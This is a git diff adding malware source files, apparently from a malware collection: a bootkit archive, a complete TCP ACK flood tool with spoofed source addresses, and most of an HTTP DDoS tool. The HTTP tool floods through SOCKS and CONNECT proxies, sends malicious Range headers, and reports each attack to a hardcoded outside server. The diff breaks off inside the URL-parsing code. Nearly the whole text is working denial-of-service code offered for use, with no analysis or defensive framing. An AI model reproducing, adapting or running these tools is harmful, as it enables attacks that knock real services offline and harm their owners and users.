diff --git a/libs/StonedBootkitFramework.7z b/libs/StonedBootkitFramework.7z
new file mode 100644
index 00000000..033f7e94
Binary files /dev/null and b/libs/StonedBootkitFramework.7z differ
diff --git a/libs/VirTool.DDoS.ACK.c b/libs/VirTool.DDoS.ACK.c
new file mode 100644
index 00000000..b696fa7c
--- /dev/null
+++ b/libs/VirTool.DDoS.ACK.c
@@ -0,0 +1,194 @@
+/*
+	This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
+*/
+#include <unistd.h>
+#include <time.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <netinet/tcp.h>
+#include <netinet/ip.h>
+#include <netinet/in.h>
+#include <netinet/if_ether.h>
+#include <netdb.h>
+#include <net/if.h>
+#include <arpa/inet.h>
+#define MAX_PACKET_SIZE 4096
+#define PHI 0x9e3779b9
+static unsigned long int Q[4096], c = 362436;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+void init_rand(unsigned long int x)
+{
+	int i;
+	Q[0] = x;
+	Q[1] = x + PHI;
+	Q[2] = x + PHI + PHI;
+	for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
+}
+unsigned long int rand_cmwc(void)
+{
+	unsigned long long int t, a = 18782LL;
+	static unsigned long int i = 4095;
+	unsigned long int x, r = 0xfffffffe;
+	i = (i + 1) & 4095;
+	t = a * Q[i] + c;
+	c = (t >> 32);
+	x = t + c;
+	if (x < c) {
+	x++;
+	c++;
+	}
+	return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int count)
+{
+	register unsigned long sum = 0;
+	while( count > 1 ) { sum += *buf++; count -= 2; }
+	if(count > 0) { sum += *(unsigned char *)buf; }
+	while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
+	return (unsigned short)(~sum);
+}
+unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
+	struct tcp_pseudo
+	{
+	unsigned long src_addr;
+	unsigned long dst_addr;
+	unsigned char zero;
+	unsigned char proto;
+	unsigned short length;
+	} pseudohead;
+	unsigned short total_len = iph->tot_len;
+	pseudohead.src_addr=iph->saddr;
+	pseudohead.dst_addr=iph->daddr;
+	pseudohead.zero=0;
+	pseudohead.proto=IPPROTO_TCP;
+	pseudohead.length=htons(sizeof(struct tcphdr));
+	int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
+	unsigned short *tcp = malloc(totaltcp_len);
+	memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
+	memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
+	unsigned short output = csum(tcp,totaltcp_len);
+	free(tcp);
+	return output;
+}
+void setup_ip_header(struct iphdr *iph)
+{
+	iph->ihl = 5;
+	iph->version = 4;
+	iph->tos = 0;
+	iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
+	iph->id = htonl(54321);
+	iph->frag_off = 0;
+	iph->ttl = MAXTTL;
+	iph->protocol = 6;
+	iph->check = 0;
+	iph->saddr = inet_addr("192.168.3.100");
+}
+void setup_tcp_header(struct tcphdr *tcph)
+{
+	tcph->source = htons(5678);
+	tcph->seq = rand();
+	tcph->ack_seq = 1;
+	tcph->res2 = 0;
+	tcph->doff = 5;
+	tcph->ack = 1;
+	tcph->window = htons(65535);
+	tcph->check = 0;
+	tcph->urg_ptr = 0;
+}
+void *flood(void *par1)
+{
+	char *td = (char *)par1;
+	char datagram[MAX_PACKET_SIZE];
+	struct iphdr *iph = (struct iphdr *)datagram;
+	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
+	struct sockaddr_in sin;
+	sin.sin_family = AF_INET;
+	sin.sin_port = htons (rand() % 20480);
+	sin.sin_addr.s_addr = inet_addr(td);
+	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+	if(s < 0){
+	fprintf(stderr, ":: cant open raw socket. got root?\n");
+	exit(-1);
+	}
+	memset(datagram, 0, MAX_PACKET_SIZE);
+	setup_ip_header(iph);
+	setup_tcp_header(tcph);
+	tcph->dest = htons (rand() % 20480);
+	iph->daddr = sin.sin_addr.s_addr;
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+	int tmp = 1;
+	const int *val = &tmp;
+	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+	fprintf(stderr, ":: motherfucking error.\n");
+	exit(-1);
+	}
+	init_rand(time(NULL));
+	register unsigned int i;
+	i = 0;
+	while(1){
+	sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+	iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
+	iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+	tcph->seq = rand_cmwc() & 0xFFFF;
+	tcph->source = htons(rand_cmwc() & 0xFFFF);
+	tcph->check = 0;
+	tcph->check = tcpcsum(iph, tcph);
+	pps++;
+	if(i >= limiter)
+	{
+	i = 0;
+	usleep(sleeptime);
+	}
+	i++;
+	}
+}
+int main(int argc, char *argv[ ])
+{
+	if(argc < 5){
+	fprintf(stderr, "Invalid parameters!\n");
+	fprintf(stdout, "Usage: %s <IP> <threads> <throttle, -1 for no throttle> <time>\n", argv[0]);
+	exit(-1);
+	}
+	int num_threads = atoi(argv[2]);
+	int maxpps = atoi(argv[3]);
+	limiter = 0;
+	pps = 0;
+	pthread_t thread[num_threads];
+	int multiplier = 20;
+	int i;
+	for(i = 0;i<num_threads;i++){
+	pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
+	}
+	fprintf(stdout, ":: sending all the packets..\n");
+	for(i = 0;i<(atoi(argv[4])*multiplier);i++)
+	{
+	usleep((1000/multiplier)*1000);
+	if((pps*multiplier) > maxpps)
+	{
+	if(1 > limiter)
+	{
+	sleeptime+=100;
+	} else {
+	limiter--;
+	}
+	} else {
+	limiter++;
+	if(sleeptime > 25)
+	{
+	sleeptime-=25;
+	} else {
+	sleeptime = 0;
+	}
+	}
+	pps = 0;
+	}
+	return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.ARME.c b/libs/VirTool.DDoS.ARME.c
new file mode 100644
index 00000000..313c5a22
--- /dev/null
+++ b/libs/VirTool.DDoS.ARME.c
@@ -0,0 +1,709 @@
+#include <pthread.h>
+#include <sys/resource.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <signal.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <ctype.h>
+
+#define RND_CHAR (char)((rand() % 26)+97)
+
+char *useragents[] = {
+	"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
+	"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
+	"Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
+	"Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
+	"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
+	"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
+	"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
+	"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
+	"Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
+	"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
+	"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
+	"Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
+	"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
+	"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
+	"Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
+	"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
+	"Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
+	"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
+	"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
+	"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
+	"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
+	"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
+	"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
+	"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
+	"Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
+	"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
+	"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
+	"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
+	"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+};
+#define ATTACKPORT 80
+//char *postformat = "%s /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: #useragent#\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\n%s\r\n%s";
+char *postformat = "HEAD / HTTP/1.0\r\nHost: %s\r\nUser-Agent: %s\r\nRange:bytes=%s\r\nAccept-Encoding: gzip, deflate, compress\r\nConnection: close\r\n\r\n";
+char *postpayload;
+struct urlparts {
+	char * name;
+	char separator[4];
+	char value[128];
+} parts[] = {
+	{ "scheme", ":" },
+	{ "userid", "@" },
+	{ "password", ":" },
+	{ "host", "//" },
+	{ "port", ":" },
+	{ "path", "/" },
+	{ "param", ";" },
+	/*{ "query", "?" },*/
+	{ "fragment", "#" }
+};
+enum partnames { scheme = 0, userid, password, host, port, path, param, query, fragment } ;
+#define NUMPARTS (sizeof parts / sizeof (struct urlparts))
+struct urlparts *returnparts[8];
+struct urllist { char *url; int done; struct urllist *next; struct urllist *prev; };
+struct proxy { char *type; char *ip; int port; int working; };
+struct list { struct proxy *data; char *useragent; struct list *next; struct list *prev; };
+struct list *head = NULL;
+char parseError[128];
+int parseURL(char *url, struct urlparts **returnpart);
+char * strsplit(char * s, char * tok);
+char firstpunc(char *s);
+int strleft(char * s, int n);
+void setupparts();
+void freeparts();
+char *stristr(const char *String, const char *Pattern);
+char *str_replace(char *orig, char *rep, char *with);
+char *geturl(char *url, char *useragent, char *ip);
+char *ipstr;
+unsigned int fnGetIP(char *szHost);
+static int rps = 0;
+
+char *fznGenerateRange()
+{
+	char szBytes[12000] = "0-";
+	char szAdd[12];
+	for (int i = 0; i <= 1299; i++)
+	{
+		sprintf(szAdd, ",5-%d", i);
+		strcat(szBytes, szAdd);
+		bzero(szAdd, 12);
+	}
+
+	return szBytes;
+}
+
+void *flood(void *par) {
+	struct list *startpoint = (struct list *)par;
+	int i;
+	struct sockaddr_in serverAddr;
+	signal(SIGPIPE, SIG_IGN);
+	while(1)
+	{
+		int sent = 0;
+		if(startpoint->data->working == 0)
+		{
+			startpoint = startpoint->next;
+			usleep(10000);
+			continue;
+		}
+		
+		memset(&serverAddr, 0, sizeof(serverAddr));
+		serverAddr.sin_family = AF_INET;
+		serverAddr.sin_port = htons(startpoint->data->port);
+		serverAddr.sin_addr.s_addr = inet_addr(startpoint->data->ip);
+		int serverSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
+		u_int yes=1;
+		if (setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes)) < 0) {}
+		if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
+		{
+			startpoint->data->working = 0;
+			startpoint = startpoint->next;
+			continue;
+		}
+		if(strcmp(startpoint->data->type, "Socks4")==0)
+		{
+			unsigned char buf[10];
+			buf[0] = 0x04;
+			buf[1] = 0x01;
+			*(unsigned short*)&buf[2] = htons(ATTACKPORT);
+			*(unsigned long*)&buf[4] = inet_addr(ipstr);
+			buf[8] = 0x00;
+			if(send(serverSocket, buf, 9, MSG_NOSIGNAL) != 9)
+			{
+				startpoint->data->working = 0;
+				startpoint = startpoint->next;
+				close(serverSocket);
+				continue;
+			}
+		}
+		if(strcmp(startpoint->data->type, "Socks5")==0)
+		{
+			unsigned char buf[20];
+			buf[0] = 0x05;
+			buf[1] = 0x01;
+			buf[2] = 0x00;
+			if((sent = send(serverSocket, buf, 3, MSG_NOSIGNAL)) < 0)
+			{
+				startpoint->data->working = 0;
+				startpoint = startpoint->next;
+				close(serverSocket);
+				continue;
+			}
+			buf[0] = 0x05;
+			buf[1] = 0x01;
+			buf[2] = 0x00;
+			buf[3] = 0x01;
+			*(unsigned long*)&buf[4] = inet_addr(ipstr);
+			*(unsigned short*)&buf[8] = htons(ATTACKPORT);
+			if((sent = send(serverSocket, buf, 10, MSG_NOSIGNAL)) < 0)
+			{
+				startpoint->data->working = 0;
+				startpoint = startpoint->next;
+				close(serverSocket);
+				continue;
+			}
+		}
+		if(strcmp(startpoint->data->type, "CONNECT") == 0 || strcmp(startpoint->data->type, "TUNNEL") == 0)
+		{
+			char *connectrequest = malloc(1024);
+			bzero(connectrequest, 1024);
+			sprintf(connectrequest, "CONNECT %s:25565 HTTP/1.0\r\n\r\n", ipstr);
+			if((sent = send(serverSocket, connectrequest, strlen(connectrequest), MSG_NOSIGNAL)) < 0)
+			{
+				startpoint->data->working = 0;
+				startpoint = startpoint->next;
+				close(serverSocket);
+				continue;
+			}
+			char *recvbuf = malloc(1024);
+			bzero(recvbuf, 1024);
+			int gotbytes = recv(serverSocket, recvbuf, 1024, 0);
+			if(gotbytes < 1)
+			{
+				startpoint->data->working = 0;
+				startpoint = startpoint->next;
+				close(serverSocket);
+				continue;
+			}
+			free(recvbuf);
+		}
+		//char *httppayload = str_replace(postpayload, "#useragent#", startpoint->useragent);
+		//if(httppayload == NULL)
+		//{
+		//	startpoint = startpoint->next;
+		//	close(serverSocket);
+		//	continue;
+		//}
+		//char *tmp = NULL;
+		//while((tmp = strstr(httppayload, "%RANDOM%"))!=NULL)
+		/*{
+			*(tmp) = RND_CHAR;
+			*(tmp+1) = RND_CHAR;
+			*(tmp+2) = RND_CHAR;
+			*(tmp+3) = RND_CHAR;
+			*(tmp+4) = RND_CHAR;
+			*(tmp+5) = RND_CHAR;
+			*(tmp+6) = RND_CHAR;
+			*(tmp+7) = RND_CHAR;
+		}
+		*/
+
+		send(serverSocket, postpayload, strlen(postpayload), MSG_NOSIGNAL);
+		//free(httppayload);
+		close(serverSocket);
+		rps++;
+		usleep(50000);
+		//startpoint = startpoint->next;
+	}
+}
+
+int fnAttackInformation(int attackID)
+{
+	char szRecvBuff[1024];
+	char packet[1024];
+	char ip[] = "37.221.170.5";
+
+	snprintf(packet, sizeof(packet) - 1, "GET /~dqyefldi/response.php?auth=tru&id=%d&pro=%d HTTP/1.1\r\nHost: %s\r\nConnection: close\r\nCache-Control: no-cache\r\nOrigin: http://google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\nAccept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n", attackID, getpid(), ip);
+
+	struct sockaddr_in *remote;
+	int sock;
+	int tmpres;
+	
+ 
+	if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
+	{
+		perror("Can't create TCP socket");
+		exit(1);
+	}
+	
+	remote = (struct sockaddr_in *)malloc(sizeof(struct sockaddr_in *));
+	remote->sin_family = AF_INET;
+	tmpres = inet_pton(AF_INET, ip, (void *)(&(remote->sin_addr.s_addr)));
+	
+	if (tmpres < 0)  
+	{
+		perror("Can't set remote->sin_addr.s_addr");
+		exit(1);
+	}
+	else if (tmpres == 0)
+	{
+		fprintf(stderr, "%s is not a valid IP address\n", ip);
+		exit(1);
+	}
+	
+	remote->sin_port = htons(80);
+	
+	if (connect(sock, (struct sockaddr *)remote, sizeof(struct sockaddr)) < 0)
+	{
+		perror("Could not connect");
+		exit(1);
+	}
+		
+	tmpres = send(sock, packet, strlen(packet), 0);
+	
+	//printf("Sent %d bytes -> \n%s\n\n\n", tmpres, packet);	
+	
+	if (tmpres == -1){
+		perror("Can't send query");
+		exit(1);
+	}
+
+	int i = 1;
+	int dwTotal = 0;
+
+
+	while (1)
+	{
+		i = recv(sock, szRecvBuff + dwTotal, sizeof(szRecvBuff) - dwTotal, 0);
+		//printf("Received %d bytes\n", i);
+		if (i <= 0)
+			break;
+			
+		dwTotal += i;
+	}
+
+	szRecvBuff[dwTotal] = '\0';
+	
+
+	//printf("Received -> \n%s\n\n", szRecvBuff);
+
+	
+	close(sock);
+	
+	//printf("Sent %d bytes\n", tmpres);
+	
+	return 0;
+}
+
+
+int main(int argc, char *argv[ ]) {
+	if(argc < 6){
+		fprintf(stderr, "Invalid parameters!\n");
+		fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
+		exit(-1);
+	}
+	//fprintf(stdout, "Setting up Sockets...\n");
+	int num_threads = atoi(argv[3]);
+	char *method = argv[2];
+	if(!(strcmp(method, "GET")==0 || strcmp(method, "HEAD")==0|| strcmp(method, "POST")==0))
+	{
+		fprintf(stderr, "Invalid parameters!\n");
+		fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
+		exit(-1);
+	}
+	FILE *pFile = fopen(argv[4], "rb");
+	if(pFile==NULL)
+	{
+		perror("fopen"); exit(1);
+	}
+	fseek(pFile, 0, SEEK_END);
+	long lSize = ftell(pFile);
+	rewind(pFile);
+	char *buffer = (char *)malloc(lSize*sizeof(char));
+	fread(buffer, 1, lSize, pFile);
+	fclose (pFile);
+	int i=0;
+	char *pch = (char *)strtok(buffer, ":");
+	while(pch != NULL)
+	{
+		if(head == NULL)
+		{
+			head = (struct list *)malloc(sizeof(struct list));
+			bzero(head, sizeof(struct list));
+			head->data = (struct proxy *)malloc(sizeof(struct proxy));
+			bzero(head->data, sizeof(struct proxy));
+			head->data->working = 1;
+			head->data->ip = malloc(strlen(pch)+1); strcpy(head->data->ip, pch);
+			pch = (char *)strtok(NULL, ":");
+			if(pch == NULL) exit(-1);
+			head->data->port = atoi(pch);
+			pch = (char *)strtok(NULL, ":");
+			head->data->type = malloc(strlen(pch)+1); strcpy(head->data->type, pch);
+			pch = (char *)strtok(NULL, ":");
+			head->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
+			head->next = head;
+			head->prev = head;
+		} else {
+			struct list *new_node = (struct list *)malloc(sizeof(struct list));
+			bzero(new_node, sizeof(struct list));
+			new_node->data = (struct proxy *)malloc(sizeof(struct proxy));
+			bzero(new_node->data, sizeof(struct proxy));
+			new_node->data->working = 1;
+			new_node->data->ip = malloc(strlen(pch)+1); strcpy(new_node->data->ip, pch);
+			pch = (char *)strtok(NULL, ":");
+			if(pch == NULL) break;
+			new_node->data->port = atoi(pch);
+			pch = (char *)strtok(NULL, ":");
+			new_node->data->type = malloc(strlen(pch)+1); strcpy(new_node->data->type, pch);
+			pch = (char *)strtok(NULL, ":");
+			new_node->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
+			new_node->prev = head;
+			new_node->next = head->next;
+			head->next = new_node;
+		}
+	}
+	free(buffer);
+	const rlim_t kOpenFD = 1024 + (num_threads * 2);
+	struct rlimit rl;
+	int result;
+	rl.rlim_cur = kOpenFD;
+	rl.rlim_max = kOpenFD;
+	result = setrlimit(RLIMIT_NOFILE, &rl);
+	if (result != 0)
+	{
+		perror("setrlimit");
+		fprintf(stderr, "setrlimit returned result = %d\n", result);
+	}
+	bzero(&rl, sizeof(struct rlimit));
+	rl.rlim_cur = 256 * 1024;
+	rl.rlim_max = 4096 * 1024;
+	result = setrlimit(RLIMIT_STACK, &rl);
+	if (result != 0)
+	{
+		perror("setrlimit_stack");
+		fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
+	}
+	setupparts();
+	parseURL(argv[1], returnparts);
+	if(argc > 6 && !(strcmp(argv[6], "0") == 0))
+	{
+		ipstr = malloc(strlen(argv[6])+1);
+		bzero(ipstr, strlen(argv[6])+1);
+		strcpy(ipstr, argv[6]);
+		//fprintf(stdout, "Using manual IP...\n");
+	} else {
+		struct hostent *he;
+		struct in_addr a;
+		he = gethostbyname(returnparts[host]->value);
+		if (he)
+		{
+			while (*he->h_addr_list)
+			{
+				bcopy(*he->h_addr_list++, (char *) &a, sizeof(a));
+				ipstr = malloc(INET_ADDRSTRLEN+1);
+				inet_ntop (AF_INET, &a, ipstr, INET_ADDRSTRLEN);
+				break;
+			}
+		}
+		else
+		{ herror("gethostbyname"); }
+	}
+	
+	
+	char *postdata = malloc(1);
+	bzero(postdata, 1);
+	char *extrahead = malloc(1);
+	bzero(extrahead, 1);
+	
+	pthread_t thread[num_threads];
+	postpayload = malloc(12001);
+	sprintf(postpayload, postformat, returnparts[host]->value, useragents[rand() % 40], fznGenerateRange());
+	freeparts();
+	
+	//printf("Packet -> \n%s\n", postpayload);
+	
+	//return 0;
+	
+	//fprintf(stdout, "Starting Flood...\n");
+	
+	fnAttackInformation(atoi(argv[argc-1]));
+	
+	for(i = 0;i<num_threads;i++){
+		pthread_create(&thread[i], NULL, &flood, (void *)head);
+		pthread_detach(thread[i]);
+		head = head->next;
+	}
+	
+	int temp = atoi(argv[5]);
+	
+	for(i = 0;i<temp;i++)
+	{
+		//rps=0;
+		sleep(1);
+		//printf("R/s: %d\n", rps);
+	}
+	return 0;
+}
+void freeparts()
+{
+	return;
+	if(returnparts[0]!=NULL) { free(returnparts[0]); }
+	if(returnparts[1]!=NULL) { free(returnparts[1]); }
+	if(returnparts[2]!=NULL) { free(returnparts[2]); }
+	if(returnparts[3]!=NULL) { free(returnparts[3]); }
+	if(returnparts[4]!=NULL) { free(returnparts[4]); }
+	if(returnparts[5]!=NULL) { free(returnparts[5]); }
+	if(returnparts[6]!=NULL) { free(returnparts[6]); }
+	if(returnparts[7]!=NULL) { free(returnparts[7]); }
+	/*if(returnparts[8]!=NULL) { free(returnparts[8]); }*/
+	return;
+}
+void setupparts()
+{
+	returnparts[0] = malloc(sizeof(struct urlparts));
+	returnparts[1] = malloc(sizeof(struct urlparts));
+	returnparts[2] = malloc(sizeof(struct urlparts));
+	returnparts[3] = malloc(sizeof(struct urlparts));
+	returnparts[4] = malloc(sizeof(struct urlparts));
+	returnparts[5] = malloc(sizeof(struct urlparts));
+	returnparts[6] = malloc(sizeof(struct urlparts));
+	returnparts[7] = malloc(sizeof(struct urlparts));
+	/*returnparts[8] = malloc(sizeof(struct urlparts));*/
+	bzero(returnparts[0], sizeof(struct urlparts));
+	bzero(returnparts[1], sizeof(struct urlparts));
+	bzero(returnparts[2], sizeof(struct urlparts));
+	bzero(returnparts[3], sizeof(struct urlparts));
+	bzero(returnparts[4], sizeof(struct urlparts));
+	bzero(returnparts[5], sizeof(struct urlparts));
+	bzero(returnparts[6], sizeof(struct urlparts));
+	bzero(returnparts[7], sizeof(struct urlparts));
+	/*bzero(returnparts[8], sizeof(struct urlparts));*/
+	returnparts[0]->name = "scheme";
+	strcpy(returnparts[0]->separator, ":");
+	returnparts[1]->name = "userid";
+	strcpy(returnparts[1]->separator, "@");
+	returnparts[2]->name = "password";
+	strcpy(returnparts[2]->separator, ":");
+	returnparts[3]->name = "host";
+	strcpy(returnparts[3]->separator, "//");
+	returnparts[4]->name = "port";
+	strcpy(returnparts[4]->separator, ":");
+	returnparts[5]->name = "path";
+	strcpy(returnparts[5]->separator, "/");
+	returnparts[6]->name = "param";
+	strcpy(returnparts[6]->separator, ";");
+	/*returnparts[7]->name = "query";
+	strcpy(returnparts[7]->separator, "?");*/
+	returnparts[7]->name = "fragment";
+	strcpy(returnparts[7]->separator, "#");
+	return;
+}
+int parseURL(char *url, struct urlparts **returnpart) {
+	register i;
+	int seplen;
+	char * remainder;
+	//char * regall = ":/;?#";
+	char * regall = ":/;#";
+	//char * regpath = ":;?#";
+	char * regpath = ":;#";
+	char * regx;
+	if(!*url)
+	{
+		strcpy(parseError, "nothing to do!\n");
+		return 0;
+	}
+	if((remainder = malloc(strlen(url) + 1)) == NULL)
+	{
+		printf("cannot allocate memory\n");
+		exit(-1);
+	}
+	strcpy(remainder, url);
+	if(firstpunc(remainder) == ':')
+	{
+		strcpy(returnpart[scheme]->value, strsplit(remainder, returnpart[scheme]->separator));
+		strleft(remainder, 1);
+	}
+	if (!strcmp(returnpart[scheme]->value, "mailto"))
+	*(returnpart[host]->separator) = 0;
+	for(i = 0; i < NUMPARTS; i++)
+	{
+		if(!*remainder)
+		break;
+		if(i == scheme || i == userid || i == password)
+		continue;
+		if(i == host && strchr(remainder, '@'))
+		{
+			if(!strncmp(remainder, "//", 2))
